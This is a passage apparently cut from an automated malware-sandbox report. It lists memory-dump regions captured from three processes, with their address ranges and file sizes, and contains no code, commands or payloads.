                                                                        2.2MB

                                                                      • memory/2340-115-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-90-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-125-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-128-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-79-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-130-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-119-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-75-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-77-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-135-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-105-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-137-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-55-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-102-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-73-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-71-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-69-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-67-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-65-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-63-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-92-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-57-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-109-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-47-0x00000000006C0000-0x000000000092C000-memory.dmp
                                                                        Filesize

                                                                        2.4MB

                                                                      • memory/2340-53-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-51-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-50-0x00000000052A0000-0x00000000054DB000-memory.dmp
                                                                        Filesize

                                                                        2.2MB

                                                                      • memory/2340-49-0x00000000052A0000-0x00000000054E2000-memory.dmp
                                                                        Filesize

                                                                        2.3MB

                                                                      • memory/2340-48-0x00000000730D0000-0x0000000073881000-memory.dmp
                                                                        Filesize

                                                                        7.7MB

                                                                      • memory/3296-23-0x0000000005490000-0x0000000005491000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-18-0x00000000009B0000-0x0000000000E88000-memory.dmp
                                                                        Filesize

                                                                        4.8MB

                                                                      • memory/3296-26-0x00000000054C0000-0x00000000054C1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-20-0x0000000005460000-0x0000000005461000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-21-0x0000000005470000-0x0000000005471000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-22-0x0000000005450000-0x0000000005451000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-27-0x00000000054B0000-0x00000000054B1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-24-0x0000000005430000-0x0000000005431000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-25-0x0000000005440000-0x0000000005441000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/3296-19-0x00000000009B0000-0x0000000000E88000-memory.dmp
                                                                        Filesize

                                                                        4.8MB

                                                                      • memory/4172-15-0x0000000000D40000-0x0000000001218000-memory.dmp
                                                                        Filesize

                                                                        4.8MB

                                                                      • memory/4172-8-0x0000000005390000-0x0000000005391000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-10-0x00000000053D0000-0x00000000053D1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-9-0x00000000053E0000-0x00000000053E1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-3-0x0000000005380000-0x0000000005381000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-6-0x0000000005350000-0x0000000005351000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-7-0x0000000005360000-0x0000000005361000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-4-0x0000000005370000-0x0000000005371000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-5-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/4172-0-0x0000000000D40000-0x0000000001218000-memory.dmp
                                                                        Filesize

                                                                        4.8MB

                                                                      • memory/4172-2-0x0000000000D40000-0x0000000001218000-memory.dmp
                                                                        Filesize

                                                                        4.8MB

                                                                      • memory/4172-1-0x0000000077716000-0x0000000077718000-memory.dmp
                                                                        Filesize

                                                                        8KB